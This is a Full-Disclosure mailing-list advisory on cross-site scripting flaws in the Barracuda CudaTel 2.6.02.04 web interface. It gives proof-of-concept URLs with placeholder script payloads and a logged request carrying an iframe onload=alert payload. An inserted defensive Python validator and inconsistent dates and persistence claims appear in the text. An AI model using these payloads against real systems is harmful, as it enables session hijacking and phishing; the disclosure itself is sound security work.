List: full-disclosure
Subject: [Full-disclosure] Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-06-27 23:50:26
Message-ID: 51CCCFC2.3000207 () vulnerability-lab ! com
Title:
======
Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
Date:
=====
2013-06-25
References:
===========
http://vulnerability-lab.com/get_content.php?id=778
BARRACUDA NETWORK SECURITY ID: BNSEC-811
VL-ID:
=====
778
Common Vulnerability Scoring System:
====================================
2.5
Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution: With an expansive feature set and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.
(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple client side vulnerabilities in the Barracuda Networks CudaTel v2.6.002.040 appliance application.
Report-Timeline:
================
2012-11-27: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-28: Vendor Notification (Barracuda Networks Security - Bug Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security - Bug Bounty Program)
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]
2012-06-25: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple client side input validation vulnerabilities are detected in the Barracuda Networks CudaTel v2.6.002.040 appliance application. The non-persistent vulnerabilities allow a remote attacker to manipulate client-side application requests in the browser.
The client-side vulnerability is located in the siplist and list modules when processing requests with manipulated bbx_provider_gateway_name, bbx_provider_gateway_username or bbx_provider_gateway_host parameter listings.
Exploitation of the vulnerability requires medium application user interaction. Successful exploitation results in client-side phishing, client-side session hijacking, client-side external redirects to malware or evil websites and client-side module context manipulation (cache).
Vulnerable Module(s):
[+] siplist - Listing
[+] list - Listing
Vulnerable Parameter(s):
[+] bbx_provider_gateway_name
[+] bbx_provider_gateway_username
[+] bbx_provider_gateway_host
Proof of Concept:
=================
The client side input validation vulnerabilities can be exploited by remote attackers without a required application user account and with medium or high required user interaction. For demonstration or to reproduce ...
Path:
gui/gateway/siplist
gui/gateway/list
Parameter:
undefined, bbx_provider, rows, page & searchstring
Values:
bbx_provider_gateway_name, bbx_provider_gateway_username & bbx_provider_gateway_host
Review: List
<pre>---
count: 1
list:
-
bbx_domain_id: 6
bbx_extension_block_begin: 2008
bbx_extension_block_end: 2008
bbx_extension_id: 26
bbx_extension_id_primary: 26
bbx_extension_rcd: 2012-11-26 15:58:45.413912
bbx_extension_rpd: 2012-11-26 15:58:45.413912
bbx_extension_value: 2008
bbx_queue_id: 12
flag_auto_provision: 0
flag_external: 0
flag_locked: 0
flag_primary: 1
flag_standalone: 1
flag_super: 0
flag_voicemail: 0
show_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
sort_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
type: queue
page: 1
rows: 25
</pre>
Review: SipList
<pre>---
count: 4
page: 1
rows: 30
siplist:
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: "\">/\"/'\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_id: 22
bbx_provider_gateway_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: REFRESH
bbx_provider_gateway_username: "\">/\"/'\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_gateway_id: 23
bbx_provider_gateway_name: <[PERSISTENT INJECTED SCRIPT CODE!];)"
<="" <iframe="">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
bbx_provider_gateway_port: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_name: PSTN Gateway
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: "\"<h1>test</h1>"
bbx_provider_gateway_id: 21
bbx_provider_gateway_name: \\"<[PERSISTENT INJECTED SCRIPT CODE!]>
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: ~
bbx_provider_gateway_username: "\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
-
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: test.com
bbx_provider_gateway_id: 20
bbx_provider_gateway_name: test
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: test
bbx_provider_name: Generic SIP
</pre>
PoC:
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=&rows=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT CODE!]%20%3C&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=&rows=10&page=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT CODE!]%20%3C&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=%3C[PERSISTENT INJECTED SCRIPT CODE!]&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=%3C[PERSISTENT INJECTED SCRIPT CODE!]
http://cudatel.ptest.cudasvc.com/gui/gateway/list?_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=
http://cudatel.ptest.cudasvc.com/gui/gateway/list?_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=[PERSISTENT INJECTED SCRIPT CODE!]%20%3C&sortorder=asc&searchstring=
ALL:
cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=<[PERSISTENT INJECTED SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<
cudatel.ptest.cudasvc.com/gui/gateway/list?_=1354065786075&undefined=<[PERSISTENT INJECTED SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<
Request(s):
2:30:07.550[851ms][total 9418ms] Status: 200[OK]
GET http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&rows=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&page=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortby=bbx_provider_gateway_name=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortorder=asc&searchstring=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1833] Mime Type[text/html]
Request Header:
Host[cudatel.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Cookie[cookietest=1; bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6]
Response Header:
Date[Wed, 28 Nov 2012 01:30:08 GMT]
Server[BarracudaHTTP 2.0/2.2.10 (Unix) mod_auth_pgsql/2.0.3 mod_fastcgi/mod_fastcgi-SNAP-0811090952 mod_ssl/2.2.10 OpenSSL/0.9.8x mod_perl/2.0.2 Perl/v5.8.8]
Vary[Content-Type]
Set-Cookie[bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6; path=/]
Content-Length[1833]
Cache-Control[must-revalidate]
Expires[Thu, 28 Nov 2013 01:30:08 GMT]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[text/html]
Reference(s):
cudatel.ptest.cudasvc.com/gui/gateway/siplist
cudatel.ptest.cudasvc.com/gui/gateway/list
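As an added example (not code from the advisory or from Barracuda), the server-side check a defender would want in front of the siplist and list endpoints described in the Details and Proof of Concept sections: a strict schema for the parameters the PoC URLs manipulate (rows, page, sortby, sortorder, searchstring), so that only vetted values can be reflected into the listing response. The sort-column allow-list, the paging limits and the helper names are assumptions.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Assumptions: the columns the siplist/list views may sort by (the
# advisory names these three gateway fields) and the paging limits.
ALLOWED_SORT_COLUMNS = {
    "bbx_provider_gateway_name",
    "bbx_provider_gateway_username",
    "bbx_provider_gateway_host",
}
SORT_ORDERS = {"asc", "desc"}
MAX_ROWS, MAX_PAGE = 500, 1_000_000

# PoC URL from the advisory (page parameter injected), with the
# advisory's own placeholder standing in for the script payload.
POC_URL = ("http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075"
           "&undefined=&rows=10&page=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT CODE!]%20%3C"
           "&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=")


def _first(qs, name, default):
    values = qs.get(name)
    return values[0] if values else default


def validate_listing_query(url):
    """Return (clean, violations) for a /gui/gateway/siplist or /list URL.
    rows/page must be positive integers, sortby/sortorder must be on the
    allow-lists, searchstring is HTML-escaped before it can be echoed, and
    parameters outside the schema (_, undefined, ...) are dropped."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    clean, violations = {}, []

    for name, upper in (("rows", MAX_ROWS), ("page", MAX_PAGE)):
        raw = _first(qs, name, "1")
        if raw.isdigit() and 1 <= int(raw) <= upper:
            clean[name] = int(raw)
        else:
            violations.append(f"{name}: expected an integer in 1..{upper}, got {raw!r}")

    for name, allowed, default in (("sortby", ALLOWED_SORT_COLUMNS, "bbx_provider_gateway_name"),
                                   ("sortorder", SORT_ORDERS, "asc")):
        value = _first(qs, name, default)
        if value in allowed:
            clean[name] = value
        else:
            violations.append(f"{name}: {value!r} is not on the allow-list")

    # Free text is accepted, but the value that may be echoed is escaped.
    clean["searchstring"] = escape(_first(qs, "searchstring", ""), quote=True)
    return clean, violations
```

Run against POC_URL, the injected page value is rejected with one violation while rows, sortby and sortorder pass; a request whose sortby carries a trailing `=<...>` fails the column allow-list the same way.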
Solution:
=========
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]
Note: The upgrade is available to all customers of the appliance module and can be applied automatically or manually in the Barracuda Networks customer center.
Risk:
=====
The security risk of the (multiple) client side input validation vulnerabilities in the siplist and list modules is estimated as medium.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/